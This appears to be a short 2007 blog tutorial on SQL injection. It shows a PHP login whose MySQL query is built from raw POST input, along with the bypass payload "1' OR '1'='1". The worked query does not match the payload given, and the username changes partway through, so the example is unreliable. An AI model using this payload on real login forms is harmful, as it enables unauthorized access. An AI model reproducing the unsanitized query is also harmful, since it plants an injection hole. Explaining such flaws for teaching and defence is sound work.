« Debian Security Update Fixes krb5 Multiple Remote Code Execution Vulnerabilities
Universal Phishing Filter Bypass »

Basic SQL Injection

Published at June 30, 2007 in Articles.

demonstrate the use of SQL Injection used in logon authetication on some websites

$user = $_POST["ulogin"];
$pass = $_POST["plogin"];
$sqlquery = mysql_query("SELECT * FROM login WHERE user=’$user’ AND pass=’$pass’");
$rows = mysql_fetch_row($sqlquery);

So lets login with a user called "hammer" (aptly named) and the password "123456", the query changes to this:

$sqlquery = mysql_query("SELECT * FROM login WHERE user='hammer' AND pass='123456'")

if ($rows == 0) {
die(’Incorrect Login.’);
}

Now lets inject.
Lets say we can see that the admin is called "admin" but we dont know his pass we put in this "1′ OR ‘1′=’1" which changes it to:

$sqlquery = mysql_query("SELECT * FROM login WHERE user='FeaR' AND pass='' OR '1'='1'")

As you can see this confuses the databse as all the condition are met ‘ equals ‘ and 1 equals 1, so this will log you in, only if addslashes() is off. Otherwise it wont work.

0 Responses to “Basic SQL Injection”

Feed for this Entry Trackback Address
  1. No Comments

Leave a Reply

« Debian Security Update Fixes krb5 Multiple Remote Code Execution Vulnerabilities
Universal Phishing Filter Bypass »